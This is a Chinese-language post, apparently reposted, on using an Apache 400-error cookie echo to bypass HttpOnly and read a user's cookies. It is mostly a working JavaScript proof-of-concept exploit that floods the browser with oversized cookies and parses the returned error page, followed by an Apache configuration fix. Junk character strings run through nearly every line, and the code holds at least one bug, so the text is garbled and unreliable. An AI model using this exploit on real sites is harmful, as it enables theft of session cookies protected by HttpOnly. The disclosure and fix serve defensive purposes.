很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。" }, J. |" ?8 `
" z+ D$ l+ G0 W0 [用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
& x: w; Q* `: z# r! ~0 d 6 \) d5 H a8 U" |
7 c, t+ c V) l: H! j1 M
// http://www.exploit-db.com/exploits/18442/
\6 x h6 X8 E6 k: a7 ~function setCookies (good) {
5 Z* O6 W& @/ G) h+ G// Construct string for cookie value
2 k N( L/ X/ g) n/ ^8 Uvar str = "";) V9 m5 L5 E2 g) M, Z/ U$ |( t, n0 N' v
for (var i=0; i< 819; i++) {
( S, N- L9 O1 r! Zstr += "x";
4 M( c% `0 a& R( m2 r}
% _: H" E7 W e4 m* \3 |// Set cookies
1 O4 @# J' G' T% H. r" G1 J# g5 Wfor (i = 0; i < 10; i++) {
) k1 S1 n) O; \) ~: M. w// Expire evil cookie
* E4 P0 L1 l) X! b0 d, _if (good) {
( q& @ d4 \( |. o+ hvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
4 g" d) [* r& e, C+ u}
* t0 H& z& G8 Q( [' G' J5 q2 B// Set evil cookie; W; f6 E2 F) ~0 \+ S
else {
9 t% K5 e; b; X+ tvar cookie = "xss"+i+"="+str+";path=/";/ T* D. w" g, v$ F( S) N6 L7 V+ Z5 f# C
}
9 I5 P& ?! B. |6 p8 Edocument.cookie = cookie;9 Q" G- H* U* P9 w- x' Q Y Y
}
* q; [4 B( N8 T+ V4 q}
$ ]1 e5 c, l+ s) jfunction makeRequest() {: |8 x' E: _; r1 y7 q
setCookies();. c! D1 w! F4 B% Z v
function parseCookies () {
7 l( @3 i* G. qvar cookie_dict = {};/ v% M6 f; a; T, v& h4 W
// Only react on 400 status+ V5 r A( Z; m. L: P6 k N
if (xhr.readyState === 4 && xhr.status === 400) {
/ q+ _( R) R8 S0 i0 n! E4 J) Y+ m// Replace newlines and match <pre> content
$ r! w) H0 Q; X- B; yvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
) g% v. `- ~. ?, l- V5 Rif (content.length) {& r5 g" A: {: X) u" @) V+ e
// Remove Cookie: prefix
) }( I5 F) p0 ]" [content = content[1].replace("Cookie: ", "");
, W- f1 }# J- l/ ~8 T$ u3 \4 wvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
; h) O Y; F) _% i- h7 T8 s/ k// Add cookies to object
' d, ^$ N2 T7 W: \for (var i=0; i<cookies.length; i++) {
" P" a" b6 b2 jvar s_c = cookies.split('=',2);
B5 c4 E) \+ b( C9 _2 m* O9 ucookie_dict[s_c[0]] = s_c[1];8 r' E" t4 [1 X
}# A, }& v- E9 p
}5 f' Z/ G% C& O- R
// Unset malicious cookies
; m' Z* ~/ C# _) F% Z8 _5 T+ csetCookies(true);
: J$ s. t- o7 J9 `0 Walert(JSON.stringify(cookie_dict));2 i# L) D2 @& m, ]8 J! ~9 ~/ x+ |
}
* [; `7 }" {% y1 N}
8 _; l, a1 l4 h* [: z9 E// Make XHR request
/ y. a$ m( N( g# w( Mvar xhr = new XMLHttpRequest();; H) J7 B" O( ^$ n! u; y
xhr.onreadystatechange = parseCookies;" x0 o4 [6 n+ |# e. g
xhr.open("GET", "/", true);! i! W+ U# t: V2 i
xhr.send(null);8 w% k$ ?: |6 U
}
/ u8 e; [+ r; I. omakeRequest(); m0 k9 \3 p' M9 M0 W
/ L- T4 d! p9 }0 J: p
你就能看见华丽丽的400错误包含着cookie信息。
& \( c# N0 V' {0 X9 H! V
* ?- i7 V( d) Y# M下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#+ P7 C6 t' c+ X6 D0 [" A6 O
- B$ ^* `+ V2 V" F; g& x
修复方案:" h" W8 ]% M- c. D6 U% t
# g8 Z6 l% u; f" X% N# MApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下9 E! t, A. t5 H# m
% S$ e9 {4 L0 Q; n
In the event of a problem or error, Apachecan be configured to do one of four things,
) I+ u; _6 @; |% } |- P# n/ ?& U6 B1 r0 Q2 Q( h( S
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息( ]! K- j# ^) r. J
2. output acustomized message输出一段信息, F5 Z6 p/ b; t/ D
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
; L6 N) v% H7 A' a# }- K4. redirect to an external URL to handle theproblem/error转向一个外部URL0 Z4 X3 z5 J' I# {/ s
% \ Y9 r+ D4 u5 _: S- i) C: @: W
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
0 f6 b4 j, h2 x$ e* p& _- [" K/ N8 E" y; d# F# w
Apache配置:/ @$ n$ r, v$ u# h) A" ?% N
$ O5 j/ y# |. w& ~* P$ YErrorDocument400 " security test"
: r/ s# I7 m- q4 ?+ e5 }
6 b" F: @: g$ ?# N当然,升级apache到最新也可:)。+ o3 H( ?* C" p; p8 `4 z& d# g. `
0 c; S5 X6 t ^1 o5 Z2 F0 J, E参考:http://httpd.apache.org/security/vulnerabilities_22.html/ o+ d5 A: z1 v
1 b5 S8 q' h3 Q) s: X1 i/ n |